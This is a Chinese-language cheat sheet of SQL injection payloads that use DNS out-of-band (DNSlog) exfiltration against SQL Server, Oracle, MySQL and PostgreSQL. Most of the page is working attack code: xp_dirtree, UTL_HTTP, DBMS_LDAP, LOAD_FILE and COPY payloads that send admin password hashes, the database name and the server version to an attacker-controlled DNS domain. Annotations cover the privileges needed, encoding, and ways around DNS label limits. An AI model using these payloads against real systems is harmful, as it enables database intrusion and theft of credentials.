支持的数据库类型
- SQL Server
- MySQL
- Oracle
- PostgreSQL
注入姿势（DNS 带外注入 / DNSlog）：以下 payload 的共同思路是让目标数据库主动解析一个把查询结果拼在最左侧 label 里的域名，然后在自己控制的 DNS 日志中读取结果；示例中的 s.livesina.com、*.ceye.io 均为占位的 DNSlog 域名，使用时替换为自己的域名。注意单个 DNS label 最长 63 字节、整个域名最长 253 字节，且 label 只能含字母、数字和连字符，较长或含特殊字符的哈希需要先 HEX 编码并分段外带。
SQL Server
Example:
-- Out-of-band (DNS) exfiltration of the sa login's password hash on SQL Server:
-- the hex-encoded hash becomes the left-most label of a hostname, and xp_dirtree
-- makes the server resolve that hostname while it tries to reach a UNC share.
-- xp_dirtree returns nothing useful; the lookup arriving at your DNS log is the result.
-- Prerequisites / caveats to confirm on the target (not shown on this page):
--   * reading sys.sql_logins.password_hash requires CONTROL SERVER (sysadmin);
--   * the DB host must be allowed to send DNS / SMB traffic outbound;
--   * fn_varbintohexstr emits a '0x'-prefixed string that on SQL Server 2012+
--     is well over 100 characters, i.e. longer than the 63-octet DNS label
--     limit, so the value will usually have to be split before it resolves;
--   * the sa login is often renamed as hardening, in which case the subquery
--     yields NULL and nothing is executed.
-- 's.livesina.com' is a placeholder for a DNS log domain you control.
DECLARE @hash_label varchar(1024);
DECLARE @cmd varchar(2048);

-- hex string of the hash (e.g. 0x0200...), or NULL when no 'sa' row is visible
SET @hash_label = (
    SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash)
    FROM sys.sql_logins
    WHERE name = 'sa'
) + '.s.livesina.com';

-- builds: master..xp_dirtree "\\<hash>.s.livesina.com\foobar$"
-- (the string is kept exactly as on the original page, line break included)
SET @cmd = ' master .. xp_dirtree
"\\' + @hash_label + '\foobar$"';
EXEC (@cmd);
Oracle
Example1:
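-- Forces the Oracle server to resolve the given hostname (UTL_INADDR does a DNS
-- lookup); the returned address is irrelevant, the query reaching your DNS log
-- is the signal. Oracle requires a FROM clause for a scalar SELECT, so the
-- statement selects FROM DUAL. On 11g and later this needs a network ACL granting
-- the current user the 'resolve' privilege -- confirm on the target. If the name
-- does not resolve the call raises ORA-29257, but the lookup has already been sent.
SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com') FROM DUAL;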
Example2:
-- Makes the Oracle server issue an HTTP GET (UTL_HTTP.REQUEST); the hostname has
-- to be resolved first, so the DNS query reaches your log even when the HTTP
-- connection itself is blocked. On 11g and later UTL_HTTP needs a network ACL
-- granting 'connect' to the current user -- confirm on the target; a blocked
-- request typically surfaces as ORA-29273 after the lookup has already happened.
SELECT
    UTL_HTTP.REQUEST('http://test.y.livesina.com/test') AS http_response
FROM SYS.DUAL;
Example3 (same payload as Example2):
-- Identical to Example2: an outbound HTTP request via UTL_HTTP, used only for the
-- DNS resolution it triggers. Same prerequisites (network ACL with 'connect' on
-- 11g+, outbound DNS from the DB host) -- confirm on the target.
SELECT
    UTL_HTTP.REQUEST('http://test.y.livesina.com/test') AS http_response
FROM SYS.DUAL;
Example4:
-- Same effect through the HTTPURITYPE object type: GETCLOB() fetches the URL,
-- which forces the hostname to be resolved first. Worth trying when UTL_HTTP has
-- been revoked from PUBLIC but the URI types are still usable -- verify on the
-- target; it is subject to the same 11g+ network ACL checks.
SELECT
    HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() AS response_body
FROM SYS.DUAL;
Example5:
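-- DBMS_LDAP.INIT opens an LDAP session to host:port, which makes the server
-- resolve the hostname first; the DNS query is the signal, the LDAP connection
-- is not expected to succeed. The argument list is a plain (host, port) pair --
-- an unbalanced '((' here is a syntax error. On 11g and later this needs a
-- network ACL for the current user -- confirm on the target.
SELECT DBMS_LDAP.INIT('test.s.livesina.com', 80) FROM DUAL;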
Example6:
-- Exfiltrates the SYS password verifier by concatenating it in front of the DNS
-- log domain and handing the result to DBMS_LDAP.INIT as the LDAP host.
-- Caveats to confirm on the target: SYS.USER$ is only readable with DBA/SYSDBA
-- rights; the 'password' column holds the legacy 10G (DES) verifier, which on
-- 12c+ may be NULL depending on the allowed-logon-version setting (the SHA
-- verifiers live in 'spare4') -- a NULL value collapses the hostname to the bare
-- domain; DBMS_LDAP needs a network ACL on 11g+. The 16-hex-char verifier fits
-- within a single 63-octet DNS label.
SELECT
    DBMS_LDAP.INIT(
        (SELECT password FROM SYS.USER$ WHERE name = 'SYS') || '.s.livesina.com',
        80
    ) AS ldap_session
FROM SYS.DUAL;
Mysql
Example:
-- Out-of-band (DNS) exfiltration through LOAD_FILE: the value to leak is placed
-- in the left-most label of a UNC path (\\<value>.<your-domain>\abc) and mysqld
-- resolves that hostname while trying to open the share. LOAD_FILE itself returns
-- NULL here; the lookup reaching your DNS log is the result.
-- Prerequisites / caveats to confirm on the target (not shown on this page):
--   * the UNC form is only resolved when mysqld runs on Windows;
--   * LOAD_FILE needs the FILE privilege and is subject to secure_file_priv;
--   * mysql.user.password was replaced by authentication_string in 5.7+;
--   * mysql_native_password hashes start with '*', which is not a valid
--     hostname character, so the value usually has to be wrapped in HEX()
--     and split to stay within the 63-octet label limit.
-- 's.livesina.com' and '*.ceye.io' are placeholder DNS log domains.

-- root's password hash (reading mysql.user needs SELECT on the mysql schema)
SELECT LOAD_FILE(
    CONCAT(
        '\\\\',
        (SELECT password FROM mysql.user WHERE user = 'root' LIMIT 1),
        '.s.livesina.com\\abc'
    )
);

-- current database name, injected via UNION into a two-column query
SELECT *
FROM test
WHERE id = 1
    AND 1 = 2
UNION
SELECT
    1,
    LOAD_FILE(
        CONCAT('\\\\', (SELECT DATABASE()), '.mysql.ip.port.qlsmyg.ceye.io\\abc')
    );

-- server version, injected into the WHERE clause; no rows come back because
-- 1 = NULL is UNKNOWN, but the lookup has already been triggered
SELECT *
FROM test
WHERE id = 1
    AND 1 = (
        SELECT LOAD_FILE(
            CONCAT('\\\\', (SELECT VERSION()), '.mysql.ip.port.qlsmyg.ceye.io\\abc')
        )
    );
PostgreSQL
Example:
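-- Out-of-band (DNS) exfiltration of the postgres role's password hash: the hash is
-- placed in the left-most label of a UNC path that COPY ... FROM tries to open,
-- which makes the server resolve the hostname. The COPY is expected to fail; the
-- lookup reaching your DNS log is the result.
-- Prerequisites / caveats to confirm on the target (not shown on this page):
--   * reading pg_shadow and COPY FROM a server-side file both need superuser
--     (or pg_read_server_files on PG 11+);
--   * the UNC path is only resolved when the server runs on Windows;
--   * since PG 10 the hash may be SCRAM-SHA-256 and contain '$', '+', '/', '='
--     -- not valid in a DNS label -- and the 63-octet label limit applies;
--   * the helper table and function are left behind; drop them when done.
-- 's.livesina.com' is a placeholder for a DNS log domain you control.
-- Note: BEGIN and the first statement of the function body must be separated
-- by whitespace ("BEGINSELECT" is a syntax error).
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE
    exec_cmd TEXT;
    query_result TEXT;
BEGIN
    -- password hash of the postgres role
    SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename = 'postgres');
    -- builds: COPY table_output(content) FROM E'\\\\<hash>.s.livesina.com\\foobar.txt'
    -- whose inner E-string decodes to the UNC path \\<hash>.s.livesina.com\foobar.txt
    exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\' || query_result || E'.s.livesina.com\\\\foobar.txt\'';
    EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();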